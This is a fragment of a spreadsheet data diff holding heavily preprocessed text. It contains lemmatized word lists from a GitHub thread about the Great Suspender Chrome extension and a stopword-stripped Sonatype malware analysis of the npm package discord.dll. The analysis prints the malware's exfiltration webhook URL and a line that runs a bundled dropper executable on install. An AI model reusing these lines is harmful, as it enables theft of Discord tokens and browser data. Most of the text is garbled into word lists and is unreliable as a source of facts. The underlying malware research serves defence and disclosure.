'owner', 'contact', 'information', 'extension', 'analytic', 'project', 'open', 'source', 'owner', 'source', 'available', 'review', 'belief', 'personentity', 'faith', 'danger', 'community', 'chrome', 'user', 'extension', 'person', 'opportunity', 'transparency', 'communication', 'reasonable', 'person', 'wonder', 'purchase', 'chrome', 'extension', 'remote', 'code', 'execution', 'user', 'knowledge', 'code', 'change', 'chrome', 'store', 'tracker', 'privacy', 'policy', 'maxxyme', 'nerdthened', 'hacfi', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'author', 'open', 'analytic', 'change', 'legitimate', 'analytic', 'intention', 'comment', 'user', 'line', 'analytic', 'malware', 'people', 'sort', 'analytic', 'other', 'path', 'extension', 'great', 'suspender', 'comment', 'thread', 'open', 'analytic', 'hacker', 'opensource', 'software', 'malicious', 'purpose', 'official', 'part', 'system', 'panic', 'little', 'extra', 'emphasis', 'close', 'investigation', 'thirdparty', 'server', 'part', 'alternative', 'analytic', 'little', 'forgiving', 'innocent', 'sure', 'intent', 'open', 'analytic', 'system', 'host', 'owebanalyticscom', 'analytic', 'people', 'reason', 'busy', 'time', 'detailed', 'probe', 'website', 'poor', 'english', 'speaker', 'post', 'publisher', 'benefit', 'doubt', 'extra', 'analytic', 'google', 'policy', 'user', 'privacy', 'policy', 'chrome', 'webstore', 'httpsgreatsuspendergithubioprivacy', 'course', 'aware', 'change', 'privacy', 'policy', 'accurate', 'know', 'analytic', 'user', 'privacy', 'policy', 'google', 'policy', 'information', 'extension', 'page', 'store', 'inaccurate', 'owner', 'contact', 'project', 'open', 'source', 'privacy', 'policy', 'accurate', 'big', 'reason', 'malicious', 'action', 'major', 'flag', 'suspicious', 'scrutiny', 'skepticism', 'simple', 'mistake', 'evidence', 'malicious', 'stupidity', 'rosy', 'major', 'problem', 'safety', 'password', 'sale', 'project', 'open', 'source', 'code', 'code', 'chrome', 'webstore', 'responsible', 'action', 'current', 'owner', 'extension', 'promise', 'right', 'issue', 'thank', 'centralized', 'location', 'discussion', 'topic', 'user', 'information', 'need', 'order', 'decision', 'much', 'need', 'couple', 'thing', 'fair', 'edit', 'post', 'extension', 'chrome', 'store', 'store', 'general', 'rule', 'power', 'source', 'innocent', 'comment', 'thread', 'discussion', 'themageking', 'comment', 'reply', 'ossilator', 'comment', 'clear', 'confusion', 'extension', 'trck', 'domain', 'permission', 'afaik', 'site', 'malicious', 'bitcoin', 'company', 'malicious', 'extension', 'personal', 'problem', 'able', 'hedge', 'javascript', 'developer', 'design', 'manifest', 'chrome', 'application', 'understanding', 'documentation', 'subject', 'google', 'website', 'extension', 'manifestjson', 'section', 'control', 'many', 'site', 'path', 'code', 'certain', 'short', 'google', 'developer', 'unrelated', 'note', 'email', 'notification', 'eastern', 'time', 'password', 'external', 'javascript', 'addition', 'getpassword', 'function', 'function', 'japanese', 'part', 'reason', 'comment', 'notification', 'evidence', 'function', 'weird', 'certain', 'check', 'event', 'handler', 'getpassword', 'function', 'inactivist', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'thank', 'entire', 'situation', 'whole', 'thing', 'incivility', 'beneficial', 'rude', 'good', 'luck', 'thumb', 'heart', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'author', 'fine', 'scary', 'thing', 'dmuth', 'poopooracoocoo', 'unixorn', 'dgomesbr', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'skycafemix', 'share', 'decision', 'answer', 'thegreatsuspender', 'hearing', 'uncomfortable', 'thegreatsuspender', 'quick', 'check', 'show', 'domain', 'bitcoin', 'name', 'strong', 'attempt', 'anonymous', 'trust', 'thegreatsuspender', 'outliner', 'license', 'author', 'rumor', 'extension', 'site', 'abandonware', 'lack', 'response', 'post', 'author', 'strike', 'honest', 'programmer', 'life', 'abandonware', 'trust', 'thegreatsuspender', 'offline', 'automatic', 'download', 'extra', 'functionality', 'nonfree', 'version', 'outliner', 'version', 'visa', 'card', 'instant', 'gratification', 'week', 'great', 'automatic', 'backup', 'local', 'google', 'drive', 'tab', 'window', 'outliner', 'close', 'entire', 'window', 'type', 'note', 'name', 'window', 'poof', 'window', 'light', 'page', 'internet', 'page', 'note', 'chrome', 'surprising', 'point', 'safari', 'parallel', 'gb', 'chrome', 'task', 'manager', 'safe', 'noticed', 'outliner', 'window', 'long', 'time', 'link', 'ghost', 'window', 'restoring', 'clearing', 'uninstall', 'thegreatsuspender', 'hope', 'experience', 'outliner', 'fine', 'free', 'mode', 'datum', 'chrome', 'storage', 'bulletproof', 'rate', 'happy', 'decision', 'unwieldy', 'tab', 'good', 'opportunity', 'weight', 'maxxyme', 'ctimmerman', 'heart', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'skycafemix', 'storage', 'bulletproof', 'window', 'great', 'suspender', 'chrome', 'crash', 'unable', 'restore', 'anime', 'eye', 'good', 'luck', 'resolution', 'clueless', 'doubt', 'datum', 'scary', 'stuff', 'other', 'acceptable', 'computer', 'work', 'well', 'reaction', 'wrong', 'copy', 'link', 'dmuth', 'great', 'suspender', 'outliner', 'good', 'replacement', 'bluephoenix', 'pallas42', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'thank', 'guy', 'kind', 'extension', 'heavy', 'tab', 'context', 'open', 'page', 'sure', 'dmuth', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'concerned', 'stealth', 'tracking', 'reason', 'source', 'easy', 'chromeextension', 'developer', 'mode', 'click', 'load', 'unpacked', 'extension', 'point', 'folder', 'current', 'issue', 'reason', 'freak', 'thirdparty', 'openwebanalytic', 'able', 'sure', 'tick', 'automatic', 'deactivation', 'kind', 'checkbox', 'setting', 'owacmds', 'loadopenwebanalyticsversion', 'owacmdspushtrackpageview', 'function', 'documentcreateelementscript', 'textjavascript', 'owaasync', 'true', 'owasrc', 'owamodulesbasejsowatrackercombinedlatestminifiedjssiteidklbibkeccnjlkjkiokjodocebajanakgapikey2cf3d852ab70d359456ce3a0aac237a3v', 'version', 'window', 'document', 'script', 'detail', 'gsanalytic', 'gsanalytic', 'actual', 'extension', 'chrome', 'store', 'option', 'loadopenwebanalytic', 'weird', 'experiment', 'user', 'machine', 'experiment', 'tracking', 'malicious', 'good', 'spread', 'malicious', 'people', 'extension', 'developer', 'mode', 'install', 'option', 'issue', 'developermode', 'extension', 'extremeheat', 'ctimmerman', 'thumb', 'thumb', 'rocket', 'emoji', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'issue', 'openwebanalytic', 'theory', 'checkbox', 'extension', 'folder', 'case', 'source', 'thirdparty', 'reaction', 'reaction', 'sorry', 'wrong', 'title', 'maintainer', 'malicious', 'maintainer', 'malicious', 'copy', 'link', 'author', 'violation', 'stretch', 'important', 'poke', 'maintainer', 'extension', 'store', 'folder', 'significant', 'difference', 'manifestjson', 'reaction', 'reaction', 'wrong', 'item', 'copy', 'link', 'marvelous', 'suspender', 'store', 'else', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'marvelous', 'suspender', 'store', 'else', 'reaction', 'sorry', 'wrong', 'copy', 'marvelous', 'suspender', 'store', 'store', 'httpschromegooglecomwebstoredetailthemarvelloussuspendernoogafoofpebimajpfpamcfhoaifemoahlen', 'discussion', 'skplunkerin', 'parad0x', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'author', 'comment', 'discussion', 'fork', 'none', 'store', 'wall', 'text', 'issue', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'sense', 'marvelous', 'suspender', 'thing', 'gaming', 'desktop', 'gb', 'video', 'entire', 'thing', 'video', 'mouse', 'desktop', 'marvelous', 'suspender', 'tab', 'time', 'bricked', 'machine', 'minute', 'time', 'thing', 'tab', 'time', 'second', 'previous', 'makedir', 'thumb', 'skplunkerin', 'ctimmerman', 'rocket', 'emoji', 'reaction', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'timetopanic', 'timetopanic', 'password', 'manager', 'leak', 'pattern', 'unbelievable', 'extension', 'couple', 'month', 'good', 'password', 'manager', 'shocked', 'month', 'primary', 'account', 'possible', 'data', 'breach', 'research', 'month', 'summary', 'pregnancy', 'ready', 'bug', 'digital', 'world', 'enough', 'vote', 'mind', 'reason', 'impression', 'close', 'item', 'store', 'month', 'different', 'provider', 'various', 'service', 'unfortunate', 'little', 'money', 'company', 'possible', 'future', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'alvinlimucb', 'email', 'hundred', 'tab', 'marvelous', 'suspender', 'perpetual', 'great', 'suspender', 'back', 'sense', 'marvelous', 'suspender', 'thing', 'gaming', 'desktop', 'gb', 'video', 'entire', 'thing', 'video', 'mouse', 'desktop', 'marvelous', 'suspender', 'tab', 'time', 'bricked', 'machine', 'minute', 'time', 'thing', 'tab', 'time', 'second', 'previous', 'reply', 'email', 'comment', 'unsubscribe', 'httpsgithubcomnotificationsunsubscribeauthaf3bxfy54hxfav5x3hjakqlto3fcxancnfsm4ti37tgq', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'private', 'info', 'dark', 'countless', 'leak', 'load', 'tosh', 'much', 'nonsense', 'careless', 'private', 'info', 'dark', 'countless', 'leak', 'many', 'leak', 'bank', 'other', 'planet', 'big', 'personal', 'info', 'personal', 'info', 'good', 'measure', 'personal', 'info', 'people', 'house', 'least', 'many', 'people', 'extension', 'disabled', 'chrome', 'month', 'rest', 'wonder', 'people', 'laptop', 'sleep', 'manual', 'update', 'month', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'available', 'everyone', 'private', 'info', 'careless', 'personal', 'info', 'point', 'private', 'info', 'world', 'course', 'personal', 'info', 'sensitive', 'datum', 'appropriate', 'reaction', 'wrong', 'copy', 'link', 'available', 'everyone', 'private', 'info', 'baseless', 'statement', 'sensible', 'narrative', 'unhelpful', 'good', 'private', 'info', 'world', 'unhelpful', 'tone', 'deaf', 'statement', 'people', 'house', 'online', 'leak', 'personal', 'datum', 'leak', 'aware', 'private', 'info', 'risk', 'action', 'idle', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'sense', 'marvelous', 'suspender', 'thing', 'gaming', 'desktop', 'gb', 'video', 'entire', 'thing', 'video', 'mouse', 'desktop', 'marvelous', 'suspender', 'tab', 'time', 'bricked', 'machine', 'minute', 'time', 'thing', 'tab', 'time', 'second', 'previous', 'tab', 'marvelous', 'suspender', 'perpetual', 'great', 'suspender', 'marvellous', 'suspender', 'ton', 'tab', 'guy', 'reasonable', 'day', 'memory', 'screenshot', 'timetopanic', 'password', 'manager', 'leak', 'pattern', 'unbelievable', 'extension', 'couple', 'month', 'good', 'password', 'manager', 'shocked', 'month', 'primary', 'account', 'possible', 'data', 'breach', 'research', 'ton', 'password', 'manager', 'open', 'source', 'free', 'solid', 'full', 'crossplatform', 'compatibility', 'optional', 'cloud', 'database', 'vault', 'accessible', 'password', 'password', 'generator', 'full', 'autofill', 'autoupdate', 'support', 'thumb', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'debate', 'available', 'everyone', 'private', 'info', 'baseless', 'statement', 'sensible', 'narrative', 'unhelpful', 'good', 'private', 'info', 'world', 'unhelpful', 'tone', 'deaf', 'statement', 'people', 'house', 'online', 'leak', 'personal', 'datum', 'leak', 'aware', 'private', 'info', 'risk', 'action', 'idle', 'measure', 'personal', 'info', 'point', 'home', 'change', 'name', 'single', 'time', 'service', 'actionable', 'part', 'personal', 'info', 'vigilant', 'potential', 'identity', 'theft', 'reaction', 'wrong', 'copy', 'link', 'edited', 'measure', 'personal', 'info', 'point', 'home', 'change', 'name', 'single', 'time', 'service', 'actionable', 'part', 'personal', 'info', 'vigilant', 'potential', 'identity', 'theft', 'statement', 'undebatable', 'truth', 'false', 'credit', 'card', 'datum', 'leak', 'idle', 'idle', 'private', 'info', 'address', 'balance', 'history', 'other', 'idle', 'worry', 'opposite', 'pertinent', 'helpful', 'pertinent', 'people', 'measure', 'risk', 'level', 'increase', 'premise', 'protection', 'personal', 'protection', 'move', 'homeoffice', 'address', 'virtual', 'one', 'clear', 'aware', 'idea', 'able', 'nonsense', 'discussion', 'intervention', 'benefit', 'other', 'people', 'professional', 'cypherpunk', 'reaction', 'wrong', 'copy', 'link', 'measure', 'personal', 'info', 'point', 'home', 'change', 'name', 'single', 'time', 'service', 'actionable', 'part', 'personal', 'info', 'vigilant', 'potential', 'identity', 'theft', 'statement', 'undebatable', 'truth', 'false', 'credit', 'card', 'datum', 'leak', 'idle', 'idle', 'private', 'info', 'address', 'balance', 'history', 'other', 'idle', 'worry', 'opposite', 'pertinent', 'helpful', 'pertinent', 'people', 'measure', 'risk', 'level', 'increase', 'premise', 'protection', 'personal', 'protection', 'move', 'homeoffice', 'address', 'virtual', 'one', 'clear', 'aware', 'idea', 'able', 'nonsense', 'discussion', 'intervention', 'benefit', 'other', 'people', 'professional', 'cypherpunk', 'credit', 'card', 'course', 'whole', 'time', 'personal', 'info', 'simple', 'thing', 'address', 'name', 'finance', 'category', 'sensitive', 'info', 'personal', 'info', 'capacity', 'time', 'capability', 'finance', 'countermeasure', 'info', 'privilege', 'thing', 'personal', 'protection', 'nonsense', 'info', 'actionable', 'thing', 'credit', 'card', 'personal', 'info', 'fall', 'category', 'personal', 'info', 'stance', 'matter', 'right', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'alvinlimucb', 'email', 'day', 'defeat', 'purpose', 'native', 'chrome', 'memory', 'saving', 'sense', 'marvelous', 'suspender', 'thing', 'gaming', 'desktop', 'gb', 'video', 'entire', 'thing', 'video', 'mouse', 'desktop', 'marvelous', 'suspender', 'tab', 'time', 'bricked', 'machine', 'minute', 'time', 'thing', 'tab', 'time', 'second', 'previous', 'tab', 'marvelous', 'suspender', 'perpetual', 'great', 'suspender', 'sense', 'marvelous', 'suspender', 'thing', 'gaming', 'desktop', 'gb', 'video', 'entire', 'thing', 'video', 'mouse', 'desktop', 'marvelous', 'suspender', 'tab', 'time', 'bricked', 'machine', 'minute', 'time', 'thing', 'tab', 'time', 'second', 'previous', 'reply', 'email', 'comment', 'comment', 'unsubscribe', 'httpsgithubcomnotificationsunsubscribeauthaf3bxfy54hxfav5x3hjakqlto3fcxancnfsm4ti37tgq', 'marvellous', 'suspender', 'ton', 'tab', 'guy', 'reasonable', 'day', 'memory', 'screenshot', 'timetopanic', 'httpsgithubcomtimetopanic', 'password', 'manager', 'leak', 'pattern', 'unbelievable', 'extension', 'couple', 'month', 'good', 'password', 'manager', 'shocked', 'month', 'primary', 'account', 'possible', 'data', 'breach', 'research', 'ton', 'password', 'manager', 'open', 'source', 'free', 'solid', 'full', 'crossplatform', 'compatibility', 'optional', 'cloud', 'database', 'vault', 'accessible', 'password', 'password', 'generator', 'full', 'autofill', 'autoupdate', 'support', 'reply', 'email', 'comment', 'unsubscribe', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'computer', 'block', 'great', 'suspender', 'extension', 'sometime', 'time', 'people', 'certain', 'geographical', 'location', 'case', 'data', 'file', 'chrome', 'computer', 'offline', 'extension', 'able', 'current', 'recent', 'session', 'v716', 'great', 'suspender', 'load', 'unpacked', 'extension', 'work', 'session', 'datum', 'browser', 'history', 'one', 'type', 'chromeextensionklbibkeccnjlkjkiokjodocebajanakgsuspendedhtmlttlmap3a20bay20area20property20taxes207c20kron4pos0uri', 'httpswwwkron4comnewsbayareamapbayareapropertytaxe', 'obvious', 'tab', 'example', 'translate', 'time', 'figure', 'great', 'suspender', 'different', 'thread', 'tool', 'great', 'suspender', 'recovery', 'tool', 'available', 'store', 'easy', 'link', 'great', 'suspender', 'recovery', 'tool', 'extension', 'datatexthtmlcharsetutf8doctype', 'script', 'functioncallback', 'callbackthisi0a', 'arrayprototypeeach0a0afunction', 'setfaviconfaviconhref', 'link', 'icon0a', 'linkhref', 'faviconhref0a', 'wear', 'smartwatch', 'tip', 'documenttitle', 'documenttitle', 'restorepage', 'function', 'documentlocationhref', 'cursor', 'pointer0a0a0abody', 'marginright', 'margintop', 'textalign', 'width', 'border', 'solid', 'boxshadow', 'rgba0', 'color', 'textdecoration', 'borderradius', 'border', 'solid', 'rgba0', 'display', 'block0a', 'width', 'marginleft', 'marginright', 'color', 'wakeupbuttonwake', 'thing', 'paste', 'link', 'extension', 'text', 'editor', 'search', 'show', 'time', 'day', 'tab', 'spending', 'minute', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'chrome', 'extension', 'tab', 'example', 'great', 'desuspender', 'great', 'suspender', 'recovery', 'tool', 'search', 'result', 'extension', 'url', 'history', 'open', 'extension', 'work', 'extension', 'part', 'datatexthtmlcharsetutf8', 'datum', 'datum', 'page', 'condolence', 'work', 'long', 'url', 'datum', 'valid', 'online', 'tool', 'urldecoderorg', 'decode', 'datum', 'part', 'datatexthtmlcharsetutf8', 'input', 'datum', 'many', 'line', 'code', 'line', 'reason', 'source', 'code', 'good', 'luck', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'thank', 'input', 'tool', 'great', 'desuspender', 'tab', 'great', 'suspender', 'great', 'suspender', 'recovery', 'tool', 'tab', 'great', 'suspender', 'recovery', 'tool', 'part', 'paste', 'search', 'thank', 'urldecoderorg', 'chrome', 'history', 'right', 'hand', 'side', 'gmail', 'gmail', 'close', 'try', 'open', 'back', 'sleep', 'know', 'facebook', 'group', 'name', 'content', 'group', 'minute', 'window', 'tab', 'tab', 'window', 'one', 'text', 'editor', 'great', 'suspender', 'recovery', 'tool', 'portion', 'copy', 'link', 'tab', 'great', 'suspender', 'recovery', 'tool', 'valid', 'url', 'reason', 'url', 'various', 'issue', 'year', 'recent', 'url', 'people', 'month', 'open', 'extension', 'short', 'period', 'time', 'open', 'extension', 'current', 'session', 'mine', 'disabled', 'chrome', 'offline', 'history', 'search', 'klbibkeccnjlkjkiokjodocebajanakg', 'easy', 'window', 'computer', 'reboot', 'computer', 'last', 'boot', 'time', 'last', 'time', 'history', 'reboot', 'thank', 'time', 'reply', 'first', 'issue', 'first', 'panic', 'mode', 'working', 'tool', 'window', 'last', 'day', 'window', 'hour', 'great', 'suspender', 'recovery', 'tool', 'screenshot', 'window', 'tab', 'httpsimgurcomaaoo0ifx', 'figure', 'code', 'show', 'forum', 'update', 'great', 'desuspender', 'tabsoutliner', 'something', 'area', 'tabsoutliner', 'great', 'suspender', 'client', 'great', 'desuspender', 'open', 'tab', 'actual', 'site', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'timetopanic', 'password', 'manager', 'leak', 'pattern', 'recommendation', 'good', 'password', 'manager', 'bitwarden', 'decent', 'company', 'research', 'come', 'conclusion', 'open', 'source', 'selfhosted', 'option', 'himankpathak', 'razvan', 'thumb', 'rocket', 'emoji', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'edited', 'timetopanic', 'happy', 'site', 'site', 'random', 'password', 'good', 'wonder', 'razvan', 'thumb', 'rocket', 'emoji', 'reaction', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'prbhtkumr', 'safe', 'alternative', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'many', 'option', 'thumb', 'rocket', 'emoji', 'reaction', 'reaction', 'reaction', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'safe', 'alternative', 'safe', 'reaction', 'sorry', 'wrong', 'copy', 'link', 'safe', 'previous', 'comment', 'reaction', 'wrong', 'copy', 'link', 'fine', 'mehdichaouch', 'thumb', 'reaction', 'reaction', 'wrong', 'copy', 'link', 'fix', 'optimization', 'marvellous', 'suspender', 'reaction', 'wrong', 'kevinhe01', 'issue', 'feature', 'request', 'extension', 'permission', 'sandboxing', 'update', 'management', 'proposal', 'open', 'alimagedayad', 'issue', 'feature', 'request', 'extension', 'sandboxing', 'permission', 'system', 'closed', 'ossilator', 'issue', 'extension', 'disabled', 'chrome', 'today', 'open', 'joeyfigaro', 'issue', 'current', 'user', 'author', 'unknown', 'buyer', 'open', 'sign', 'free', 'join', 'conversation', 'sign', 'comment', 'label', 'none', 'none', 'milestone', 'development', 'branch', 'request', 'participant', 'other', 'footer', 'term', 'privacy', 'status', 'doc', 'contact', 'cookie', 'personal', 'information', 'action', 'time']</t>
         </is>
       </c>
     </row>
@@ -4430,17 +3831,12 @@
       </c>
       <c r="C154" t="inlineStr">
         <is>
-          <t>skip navigation back platform platform overview automate software supply chain sonatype repository firewall block malicious open source door sonatype nexus repository build fast centralized components sonatype lifecycle control open source risk across sdlc sonatype sbom manager simplify sbom compliance monitoring integrations work tools languages packages already solutions integrated innovation align teams fuel secure deployment developers deliver quality code fast application manage vulnerability risks legal compliance enforce policy scale industry government financial services manufacturing technology healthcare pricing resources resources featured devops downloads webinar series featured state software supply chain blog webinars whitepapers ebooks launchpad customer stories free tools sonatype repository sonatype vulnerability scanner sonatype index customer resources training workshops documentation support partners become partner join extensive sonatype partner network find partner find connect certified sonatype partner company explore software supply chain management story careers innovate us—explore opportunities sonatype events attend inperson virtual learning events newsroom keep date sonatype news contact let’s talk software supply chain book demo book demo book demo discorddll successor “fallguys” malware went undetected months november sharma minute read time share week sonatype research team identified series counterfeit components ecosystem intentionally malicious packages seem similar shady things malicious fallguys package discovered september stealing browser files discord gaming packages question published author whose account also contains look like legitimate packages genuine cases discorddll discordapp wsbdjs acaddon counterfeit components identified automated malware detection system called release integrity flagged suspicious package “wsbdjs” potentially malicious behaviour system previously identified twilionpm electorn loadyaml however looking deeper “wsbdjs” couldn’t help look author realized author published packages began analyzing packages published author exhibited obvious signs malicious behaviour “wsbdjs” others stood discorddll discorddll component conducts sinister activities hard spot upfront also uses legitimate discordjs dependency potentially distract researchers otherwise nefarious activities package comprises version sitting downloads months makes package difficult analyze consists multiple files almost heavily obfuscated base64encoded strings everywhere essence discorddll successor previously detected fallguys package starting manifest file discorddll packagejson interesting details come light packagejson manifest file discorddll github repository links throw found errors notice name github project listed jstokengrabber rather “discorddll” touted component analyzing author’s github repository found contained completely different packages existed author’s portfolio indicates possibilities either packagejson metadata fake author publishing malicious components association github author similar name linked account author behind github repositories malicious projects like “jstokengrabber” discorddll private visibility github repository author’s andor github accounts compromised point time malicious packages added actors addition quasilegitimate packages author posted github rampant projects identify discord token stealer malware grabber hints could discorddll actually discorddll soon installed discorddll fires postinstall script opens “appjs” “appjs” obfuscated base64encoded strings shown deobfuscating reformatting “appjs” reveals nodejs code easier eyes code references discord webhooks setting getting cookies “sending” data discord tokens browser files real clues however deduced base64 strings contained within applicationone base64 strings notorious anonymous logo hardly speaks discorddll’s truly malicious nature base64 strings links anonymous logo base64 strings locations browser files keep users’ roaming profiles “leveldb” files strings reveal browsers discorddll takes interest opera yandex brave google chrome suspicions arise package attempting “fallguys” exfiltrate discord browser’s “leveldb” files additionally references package collect data address username” “discordcanary” files analyzing obfuscated files package contains discorddll’s purpose becomes clear deobfuscating “webhookjs” file tells counterfeit discorddll sends collected data webhook address using real discordjs library uses dependency httpsdiscordappcomapiwebhooks716005310975967333sdtidg6rfb99eefc5nnunrluykd3qkdkl0hrinw2muazvxlxpgjg1dtsgfij1l5rrjj time writing webhook seems longer unlike previously seen “fallguys” package much simpler structure discorddll contains multiple obfuscated files would take much longer time analyze making elusive packages suspicious packages found author’s page launch mysterious files contained within soon installed called bdexe dropperexe libexe bundled exes known malware according virustotal “appjs” files contained remaining packages line code “requirechildprocessexecdropperexe” however package called “discordapp” details upon install fires postinstall script launching mysterious dropperexe would ring anyone’s alarm bells caution sonatype research team added three packages discordapp wsbdjs acaddon data sonatype20201096 complex “fallguys” successor discorddll assigned identifier sonatype20201097 recent state software supply chain report documented increase malicious code injection within projects nextgen software supply chain attacks isn’t first time seen attacks including counterfeit components discovery another counterfeit component discorddll especially “fallguys” malware already made headlines speaks damage possible software supply chain adequate protections place specs stats timeline interesting specifications statistics packages provided discorddll published months downloads discordapp published months downloads wsbdjs published hours downloads acaddon published days downloads timeline sonatype’s timeline related malicious package’s discovery reporting follows november suspicious package wsbdjs picked automated malware detection bots published hours time writing manually analyzing package packages seem suspicious revealed lurking author’s portfolio although next generation nexus intelligence automatically blocks suspicious components quarantine research team immediately adds packages data assigning identifiers sonatype20201096 sonatype20201097 november team notified malicious packages public disclosure blog post reason public disclosure centers fact packages already live secured hundreds downloads realtime install package inadvertently already risk compromising machines software supply chains therefore standard vulnerability disclosure timelines would apply case based visibility sonatype customers downloaded package customers remain protected counterfeit components like “discorddll” others sonatype’s worldclass open source intelligence includes automated malware detection technology safeguards developers customers software supply chains infections like youre sonatype customer want find code vulnerable sonatypes free nexus vulnerability scanner find quickly visit nexus intelligence insights page deep dive vulnerabilities like subscribe automatically receive nexus intelligence insights press tags vulnerabilities featured nexus intelligence product nexus intelligence insights written sharma researcher sonatype engineer holds passion perpetual learning works expert analyses frequently featured leading media outlets expertise lies vulnerability research reverse engineering software development spare time loves exploiting vulnerabilities ethically educating wide range audiences learn author posts topic posts open source mlai models attackers next target sharma packages spread bladeroid cryptostealer hijack instagram sharma curious case csrfmagic case study supply chain poisoning sharma overload unveiling hidden crisis vulnerability management vulnerabilities packages spread bladeroid cryptostealer hijack instagram vulnerabilities exploited ivanti connect ssrf vulnerability traced back xmltooling library vulnerabilities secure software supply chain explore platform started platform overview firewall repository lifecycle sbom manager integrations pricing products container auditor advanced legal pack lifecycle foundation solutions role integrated innovation developers application legal compliance industry government financial services manufacturing technology healthcare community free tools nexus repository sonatype vulnerability scanner sonatype index resources launchpad log4j updates blog whitepapers ebooks webinars customer stories partners find partner become partner amazon services openshift customer portal training workshops documentation sonatype customer support company careers newsroom investors contact press trust center subscribe latest software news events terms service privacy policy modern slavery statement event terms conditions sell personal information copyright 2008present sonatype rights reserved includes thirdparty code listed sonatype sonatype nexus trademarks sonatype apache maven maven trademarks apache software foundation m2eclipse trademark eclipse foundation trademarks property respective owners</t>
+          <t>The discord.dll is an npm component which conducts sinister activities that are hard to spot upfront. It also uses the legitimate Discord.js npm dependency to potentially distract researchers from its otherwise nefarious activities.The package comprises just one version 1.0.0, which has been sitting on npm downloads for over 5 months.</t>
         </is>
       </c>
       <c r="D154" t="inlineStr">
         <is>
           <t>https://blog.sonatype.com/discord.dll-successor-to-npm-fallguys-</t>
-        </is>
-      </c>
-      <c r="E154" t="inlineStr">
-        <is>
-          <t>['navigation', 'back', 'platform', 'platform', 'overview', 'automate', 'software', 'supply', 'chain', 'sonatype', 'repository', 'firewall', 'block', 'malicious', 'open', 'source', 'door', 'sonatype', 'repository', 'fast', 'component', 'lifecycle', 'control', 'open', 'source', 'risk', 'manager', 'compliance', 'monitoring', 'work', 'tool', 'language', 'package', 'solution', 'innovation', 'align', 'team', 'secure', 'deployment', 'developer', 'quality', 'code', 'fast', 'application', 'vulnerability', 'risk', 'legal', 'compliance', 'enforce', 'policy', 'scale', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'pricing', 'resource', 'resource', 'download', 'webinar', 'series', 'state', 'software', 'supply', 'chain', 'blog', 'webinar', 'whitepaper', 'launchpad', 'customer', 'story', 'free', 'tool', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'customer', 'resource', 'training', 'workshop', 'documentation', 'support', 'partner', 'partner', 'extensive', 'sonatype', 'partner', 'network', 'partner', 'connect', 'sonatype', 'partner', 'company', 'software', 'supply', 'chain', 'management', 'story', 'career', 'opportunity', 'event', 'virtual', 'learning', 'event', 'newsroom', 'date', 'sonatype', 'news', 'contact', 'talk', 'software', 'supply', 'chain', 'book', 'demo', 'book', 'demo', 'book', 'demo', 'discorddll', 'successor', 'fallguy', 'malware', 'undetected', 'month', 'time', 'share', 'week', 'sonatype', 'research', 'team', 'series', 'counterfeit', 'component', 'ecosystem', 'malicious', 'package', 'similar', 'shady', 'thing', 'malicious', 'fallguy', 'package', 'browser', 'file', 'discord', 'gaming', 'package', 'question', 'author', 'account', 'legitimate', 'package', 'genuine', 'case', 'discorddll', 'discordapp', 'component', 'malware', 'detection', 'system', 'release', 'integrity', 'suspicious', 'package', 'wsbdjs', 'malicious', 'behaviour', 'system', 'deep', 'wsbdjs', 'author', 'author', 'package', 'package', 'author', 'obvious', 'sign', 'malicious', 'behaviour', 'wsbdjs', 'other', 'discorddll', 'component', 'sinister', 'activity', 'hard', 'spot', 'legitimate', 'discordjs', 'dependency', 'researcher', 'nefarious', 'activity', 'package', 'version', 'sitting', 'download', 'month', 'package', 'difficult', 'analyze', 'multiple', 'file', 'string', 'essence', 'discorddll', 'successor', 'package', 'starting', 'manifest', 'file', 'discorddll', 'packagejson', 'interesting', 'detail', 'light', 'packagejson', 'manifest', 'file', 'discorddll', 'link', 'error', 'name', 'discorddll', 'component', 'author', 'different', 'package', 'author', 'portfolio', 'possibility', 'packagejson', 'metadata', 'fake', 'author', 'malicious', 'component', 'association', 'author', 'similar', 'name', 'account', 'author', 'repository', 'malicious', 'project', 'discorddll', 'private', 'author', 'andor', 'account', 'point', 'time', 'malicious', 'package', 'actor', 'addition', 'author', 'project', 'discord', 'hint', 'discorddll', 'discorddll', 'fire', 'postinstall', 'script', 'string', 'code', 'easy', 'eye', 'code', 'reference', 'discord', 'webhook', 'cookie', 'datum', 'discord', 'real', 'clue', 'base64', 'string', 'applicationone', 'base64', 'string', 'notorious', 'anonymous', 'logo', 'discorddll', 'malicious', 'nature', 'base64', 'string', 'anonymous', 'logo', 'base64', 'string', 'location', 'browser', 'file', 'user', 'profile', 'leveldb', 'file', 'string', 'browser', 'discorddll', 'interest', 'opera', 'yandex', 'brave', 'suspicion', 'package', 'fallguy', 'leveldb', 'file', 'package', 'datum', 'address', 'username', 'discordcanary', 'file', 'file', 'package', 'purpose', 'clear', 'webhookjs', 'file', 'counterfeit', 'discorddll', 'collected', 'datum', 'webhook', 'address', 'real', 'library', 'time', 'webhook', 